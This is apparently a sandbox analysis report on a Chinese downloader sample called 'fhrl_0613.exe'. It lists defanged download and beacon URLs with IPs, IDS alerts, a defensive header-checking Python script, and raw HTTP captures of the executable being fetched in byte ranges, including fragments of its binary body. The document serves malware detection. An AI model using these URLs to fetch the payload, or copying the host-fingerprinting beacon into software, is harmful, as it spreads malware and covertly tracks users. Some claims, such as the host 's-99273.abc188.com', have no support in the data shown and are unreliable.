hxxp://dl2.fhrlw.com/fhrl/fhrl_0613.exe 125.211.211.8
hxxp://software.fhrlw.cn/api/GetConfig.ashx 61.147.103.147
hxxp://software.fhrlw.cn/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 61.147.103.147
hxxp://software.fhrlw.cn/Update/version.txt?45919992 61.147.103.147
hxxp://software.fhrlw.cn/Api/GetHoliday.ashx 61.147.103.147
hxxp://software.fhrlw.cn/Api/GetWeather.ashx?province=??&city=?? 61.147.103.147
hxxp://software.fhrlw.cn/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 61.147.103.147
hxxp://software.fhrlw.cn/ad/fixad.html?id=9995 61.147.103.147
hxxp://software.fhrlw.cn/js/jquery-1.3.2.min.js 61.147.103.147
hxxp://software.fhrlw.cn/client/picchange.css 61.147.103.147
hxxp://fusa.a.sohu.com/cs/jsfile/js/c.js
hxxp://proxy.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://proxy.sogou.com/qi
hxxp://njsh.cdn.sogou.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif
hxxp://njsh.cdn.sogou.com/testgpimg/sogou_icon_short.png
hxxp://acookie.split.taobao.com/cms.gif?id=40490128&extendata=
hxxp://proxy.sogou.com/pixel?tid=E0&ver=1&extendata=
hxxp://proxy.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
hxxp://software.fhrlw.cn//js/picchange.js 61.147.103.147
hxxp://njsh.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg
hxxp://njsh.cdn.sogou.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif
hxxp://images.sohu.com/cs/jsfile/js/c.js 66.102.246.139
hxxp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata= 106.120.151.61
hxxp://dl1.fhrlw.com/fhrl/fhrl_0613.exe 61.147.103.147
hxxp://img.fhrlw.com/client/picchange.css 61.147.103.147
hxxp://img.fhrlw.com//js/picchange.js 61.147.103.147
hxxp://acookie.tanx.com/cms.gif?id=40490128&extendata= 110.75.69.67
hxxp://client.fhrlw.com/api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 61.147.103.147
hxxp://update.fhrlw.com/Update/version.txt?45919992 61.147.103.147
hxxp://img.fhrlw.com/js/jquery-1.3.2.min.js 61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736451&t1=16&bi=2&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736451&z=5268ebdce938cc9f&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NF9wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://img04.sogoucdn.com/app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif 58.215.147.38
hxxp://client.fhrlw.com/api/GetConfig.ashx 61.147.103.147
hxxp://client.fhrlw.com/Api/GetWeather.ashx?province=??&city=?? 61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://client.fhrlw.com/Api/GetHoliday.ashx 61.147.103.147
hxxp://ddl.9yfc.com/xxdd_165.exe 211.149.191.150
hxxp://inte.sogou.com/ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= 220.181.124.6
hxxp://p.inte.sogou.com/testgpimg/sogou_icon_short.png 222.211.87.185
hxxp://client.fhrlw.com/Api/SendClickData.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&date=2014-06-14&clickcount1=0&clickcount2=0&clickcount3=0&clickcount4=0 61.147.103.147
hxxp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- 220.181.124.6
hxxp://imgstore04.cdn.sogou.com/app/a/53/82ea18df-b4ae-4b17-b1ab-46cba4b98343.jpg 1.115.192.23
hxxp://img04.sogoucdn.com/app/a/53/924aed3e-a026-4cc3-996e-72927d75dda5.gif 58.215.147.38
hxxp://client.fhrlw.com/ad/fixad.html?id=9995 61.147.103.147
hxxp://dspcm.brand.sogou.com/qi 106.120.151.61

Three things stand out in this list. The Setup.ashx and SendClickData.ashx beacons carry a stable host fingerprint (setupcode=ae9b8922d6184874896f5561d8fe0643, mac=000c298a8b37, physn=00000000000000000001) and send it to both software.fhrlw.cn and client.fhrlw.com, so the two hostnames are interchangeable front ends of one back end; physn is the string stored as HDiskNum under the sougop service key, and the MAC's 00:0C:29 prefix is VMware's OUI, which would let the operator recognise this install as a virtual machine. fhrl_0613.exe is offered from three hosts (software.fhrlw.cn, dl1.fhrlw.com, dl2.fhrlw.com) and xxdd_165.exe from two (s-99273.abc188.com, ddl.9yfc.com); all fhrlw hosts except dl2.fhrlw.com resolve to 61.147.103.147, so block lists should carry the hostnames and both IPs. The sogou, sohu, taobao and tanx requests are third-party advertising and tracking endpoints loaded by the fixad.html ad page, not infrastructure specific to this sample.


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.

Both alerts are triggered by the User-Agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" that the downloader sends while fetching fhrl_0613.exe in 200 KiB Range chunks from dl1.fhrlw.com and dl2.fhrlw.com (see Traffic below). The string is evidently hard-coded rather than taken from the host: the analysis machine runs Windows XP (NT 5.1), and the ad traffic from the same run carries the genuine "MSIE 6.0; Windows NT 5.1" User-Agent. A fixed, obsolete User-Agent on Range-chunked executable downloads is a network signature for this downloader worth keeping alongside the hostname and URL indicators.
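The alerts above and the captures in the Traffic section below are easy to re-check mechanically. The Python below is an added example written for this page, not part of the report or of the sample's code: it parses a captured request or response head, matches the User-Agent against two patterns that approximate the named ET POLICY rules (an assumption; the actual rule bodies are not reproduced on this page), verifies that a Range request and its 206 reply agree (HTTP byte ranges are inclusive, so 614400-819200 is 204801 bytes, as the Content-Length confirms), and compares a declared Content-Type with the body's magic bytes. The embedded heads are copied from the captures below; the PNG body bytes are constructed.

```python
"""Checks over captured HTTP heads from a sandbox report: User-Agent policy
hits, Range/206 consistency and Content-Type versus magic bytes.
Added example, not part of the original report; heads are copied from the
report, the UA patterns approximate the named ET POLICY rules (assumption)."""
import re

UA_POLICY = {  # assumed equivalents of the two ET POLICY alerts in the report
    "fake/unsupported Windows NT 5.0": re.compile(r"Windows NT 5\.0\b"),
    "fake/unsupported MSIE 5.x": re.compile(r"MSIE 5\."),
}
MAGIC = [(b"\x89PNG\r\n\x1a\n", "image/png"), (b"GIF8", "image/gif"),
         (b"\xff\xd8\xff", "image/jpeg"), (b"MZ", "application/x-msdownload")]
RANGE_RE = re.compile(r"bytes=(\d+)-(\d+)$")
CONTENT_RANGE_RE = re.compile(r"bytes (\d+)-(\d+)/(\d+)$")


def parse_headers(raw):
    """Split a captured request/response head into (start line, headers dict);
    header names are lower-cased, any body is passed around separately as bytes."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def ua_policy_hits(headers):
    """Labels of the UA policy patterns matched by the request's User-Agent."""
    ua = headers.get("user-agent", "")
    return [label for label, rx in UA_POLICY.items() if rx.search(ua)]


def check_range_exchange(req_headers, resp_start, resp_headers):
    """Inconsistencies in a Range request / 206 reply; empty list if consistent."""
    m_req = RANGE_RE.search(req_headers.get("range", ""))
    m_resp = CONTENT_RANGE_RE.search(resp_headers.get("content-range", ""))
    if not m_req or not m_resp:
        return ["missing or unparsable Range / Content-Range"]
    r0, r1 = map(int, m_req.groups())
    c0, c1, total = map(int, m_resp.groups())
    problems = []
    if " 206 " not in resp_start:
        problems.append(f"expected 206 for a Range request, got {resp_start!r}")
    if (r0, r1) != (c0, c1):
        problems.append(f"server sent bytes {c0}-{c1}, client asked for {r0}-{r1}")
    if c1 >= total:
        problems.append("Content-Range end lies beyond the declared total size")
    expected = c1 - c0 + 1  # HTTP byte ranges are inclusive at both ends
    if int(resp_headers.get("content-length", -1)) != expected:
        problems.append(f"Content-Length should be {expected}")
    return problems


def sniff_mismatch(resp_headers, body):
    """(declared, sniffed) when Content-Type disagrees with the body's magic, else None."""
    declared = resp_headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = next((t for magic, t in MAGIC if body.startswith(magic)), "unknown")
    return None if declared == sniffed else (declared, sniffed)


# Heads copied from the report's Traffic section: one 200 KiB chunk of
# fhrl_0613.exe fetched with the downloader's fixed IE 5.01 / NT 5.0 UA ...
RANGE_REQ = """GET /fhrl/fhrl_0613.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=614400-819200
Host: dl2.fhrlw.com
"""
RANGE_RESP = """HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 614400-819200/2427616
"""
# ... and the img04.sogoucdn.com reply to a .gif request that declares
# image/jpeg while the body starts with the PNG signature (bytes constructed).
CDN_RESP = """HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
"""
CDN_BODY = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"


def analyse_samples():
    """Run the three checks over the embedded captures and return the results."""
    _, req = parse_headers(RANGE_REQ)
    resp_start, resp = parse_headers(RANGE_RESP)
    _, cdn = parse_headers(CDN_RESP)
    return {
        "ua_hits": ua_policy_hits(req),
        "range_problems": check_range_exchange(req, resp_start, resp),
        "cdn_mismatch": sniff_mismatch(cdn, CDN_BODY),
    }
```

`analyse_samples()` reports both UA policy hits, no Range inconsistencies, and an ('image/jpeg', 'image/png') mismatch for the sogoucdn reply. The range check is also the test to run over a whole set of chunks before reassembling and hashing a download: note that dl1.fhrlw.com and dl2.fhrlw.com return different ETag and Last-Modified values for the same path and size, so chunks from the two mirrors should be kept apart rather than stitched into one file.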

Traffic

GET /js/jquery-1.3.2.min.js HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.fhrlw.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 57272
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Sep 2013 02:48:44 GMT
Accept-Ranges: bytes
ETag: "5bc4399aabaace1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:24 GMT
/*.. * jQuery JavaScript Library v1.3.2.. * hXXp://jquery.com/.. *.. *
Copyright (c) 2009 John Resig.. * Dual licensed under the MIT and GPL
licenses... * hXXp://docs.jquery.com/License.. *.. * Date: 2009-02-19
17:34:21 -0500 (Thu, 19 Feb 2009).. * Revision: 6246.. */..(function(
){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return ne
w o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,
f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;
if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(t
ypeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.cle
an([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]
){return o().find(E)}var F=o(I||[]);F.context=document;F.selector=E;re
turn F}}else{return o(H).find(E)}}else{if(o.isFunction(E)){return o(do
cument).ready(E)}}if(E.selector&&E.context){this.selector=E.selector;t
his.context=E.context}return this.setArray(o.isArray(E)?E:o.makeArray(
E))},selector:"",jquery:"1.3.2",size:function(){return this.length},ge
t:function(E){return E===g?Array.prototype.slice.call(this):this[E]},p
ushStack:function(F,H,E){var G=o(F);G.prevObject=this;G.context=this.c
ontext;if(H==="find"){G.selector=this.selector+(this.selector?" ":"")+
E}else{if(H){G.selector=this.selector+"."+H+"("+E+")"}}return G},setAr
ray:function(E){this.length=0;Array.prototype.push.apply(this,E);retur
n this},each:function(F,E){return o.each(this,F,E)},index:function(E){
return o.inArray(E&&E.jquery?E[0]:E,this)},attr:function(F,H,G){va

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=614400-819200
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 614400-819200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
<<< binary body not reproduced: 204801 bytes of fhrl_0613.exe, offsets 614400-819200 of 2427616, served by dl2.fhrlw.com >>>

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:15 GMT
<<< binary body not reproduced: 204801 bytes of fhrl_0613.exe, offsets 1433600-1638400 of 2427616, served by dl2.fhrlw.com >>>

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1228800-1433600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1228800-1433600/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:57 GMT
<<< binary body not reproduced: 204801 bytes of fhrl_0613.exe, offsets 1228800-1433600 of 2427616, served by dl1.fhrlw.com; dl1 returns a different ETag and Last-Modified than dl2 for the same path and size, so the two mirrors should be hashed separately rather than assumed identical >>>

<<< skipped >>>

GET /app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif HTTP/1.1
Accept: */*
Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sat, 14 Jun 2014 09:00:48 GMT
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
ETag: 9023c15c2b74fd70a034d1b373a42e09
Expires: Mon, 14 Jul 2014 01:04:57 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 01:04:57 GMT
<<< binary body not reproduced: chunked response (first chunk size 0x90bc) whose body begins with the PNG signature, an IHDR chunk and a Photoshop ICC profile, although the request was for a .gif and the response declares Content-Type: image/jpeg >>>

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1433600-1638400
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1433600-1638400/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:10 GMT
<<< binary body not reproduced: 204801 bytes of fhrl_0613.exe, offsets 1433600-1638400 of 2427616, served by dl1.fhrlw.com (the same range was also fetched from dl2.fhrlw.com above) >>>

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2048000-2252800
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 2048000-2252800/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:06 GMT
....`[email protected]=H$.......b.".....'...6..B....E..,..S..E...r.0hns
.9...t.(........!<....o....^y g.{G'......#........&;.60CD(.8......P
..n...w.\........W.o... q..O.k.4T)V.....-.......X. ...H...0...(..,.vq6
.r.Y...w".bF.).....-..`%...17c..U`...v.O..D...!..U..2e..........p.~j.C
[email protected]%.....$t5...`..A..?.,..M#.....E.....l.....yP....$...x.%..G...@U
[email protected]..&.....r. .6.....TLZ.....rh......=|1.....,..J......w...
......4..M.9N.\.E~=....baX.N.G.x.[...7..E.q?NmFT&..../A|U.$.....u.g&..
iC...m......3......s.(R.h6.T..\g......;.w.....^....LvU.K.........4....
...U*_'3..O..K.MF..L....F.w.........PNG........IHDR...1...0.....7.....
..pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB.
...l.."#[email protected]....(.gA..Z.U\8.....}z..........
..y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$.....
.P&W. ...".....R...T.......S.d.....ly|B"......I>..................(
G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..
H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k
.o">!.........N..._....p...u.k.[..V.h..][email protected].<....
..%b..0..>[email protected][email protected]..#......)..4.\,...
X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y......
.@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.
............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r..
.Bj.]H#.-r.9.\@.... [email protected].]...k....=.....K.ut.}.
.c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#..

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=409600-614400
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 409600-614400/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:03 GMT
...3k......}H.FO.......<_...*[email protected]$>..!...&p...H........>|N
.......R...,.6d....X}....).p?E.|v.d.-.b,.`.y)......B\.}Z......E&.|..x.
Jl4....Fro.eR..0...a..nXU..^Ax.T. ..d.V...........=~...&...........kq.
......O....O...,[email protected]:.o8d.pY.......1......B../.m.Tn.T[..S.w..b..
Pw"..b...../..2.oY...^.......`3....tN(.v.. .K,..C',\.S@f..<.'...h..
Xz.I...`..B]f../.'ixtr...X.h...fZ..8.......)M.T.W~O.....{...9.........
...H....Q....4h...nl'P.y.............L'_%...K.][...Ve.W........d(...1.
v..u8....F...2."%.t..2....;2.\[email protected]. ...N .... .q....O..Z..r.s.A.
.$....n..E|.l..(.mTR...p...N....G.|H=...V.xzc...n.*.._....-c.*.g.gF.X.
[email protected]".':N..Xc.=r.z.k... #...C...6.*..p..[...i.\.bQ.!...z!...K1U(@
......0?BS.d/j...Z...b.]ph..,#..lZ...*..[c.y.....T.Y.`1...V4#.~...1*$
lD....K(U{%0.."q........L......{m.Fe.r{5..._{*B.F...^.........s...9\.,
.MD6UkL..H7..B= . .u.F..Sp..k......he..$..O;6.8..i.d$Fqz.#........y..u
.;u..wkJG4sN^].....?.... ....y.}.....(..7.. L.s.!XJ3?}........h.`.?..]
...X.^t*.M....?.. (K......dL.A... EZi.....XFTZHb....C...0g.q&.El.....9
..!~..yd.sDO.........h..N.gK..|-..<.i.9.s..2.....g..8..........qx6.
...../.o...Y.]E..G.*a..d.#...}.AW.../.m.l.G.G.B-..!k.UX......O...*(.&.
n...2.>....]...q..vp.J=M| INT..xN....O..e..%l....-w.sF].Y..~..W....
{.B...i.p.....R<.....;.F.u..........1X ..v&V.....20.M.q.. w...8@. .
......._........ggZ_......[-..K^B_.N.9t.g.v.....nK&."=....~,.0.M.^.r..
.. ..5\j....uC8.<...[..&...n....0..9.2...#..z.n...D.9.y? ....'o.]|.
.....:.......U J..g...=...MC...Ul...3.......8...i.......-v.rBI..?.

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl1.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT
Accept-Ranges: bytes
ETag: "6a985288e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:01:14 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.
<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!.
.e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<..
..O.....Q8..g.%..P.Y...`.N...t.#[email protected]=.qWD.7...x

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:29 GMT
...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F
.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?
..t..1.f.|[email protected]#.~..N..4.9`.x.>.l".q.........x.8...{
Ze>=!s.....}./...$\9<L.p_.n..0.d....8%[email protected]...!"UU...6..p'...
..D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db
.......I....B..\x*.[:.dF..VY....$"..b.".\[email protected]....&w......S..\...
..TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9...
....{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..O
L...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...
I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.
b...n....X;....j.X$D..}....j6..)[email protected].............?F..^...!.....*.w.T
@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>
;. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^&l
t;..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,...
..`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.....
..E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9
.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A..
..#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.
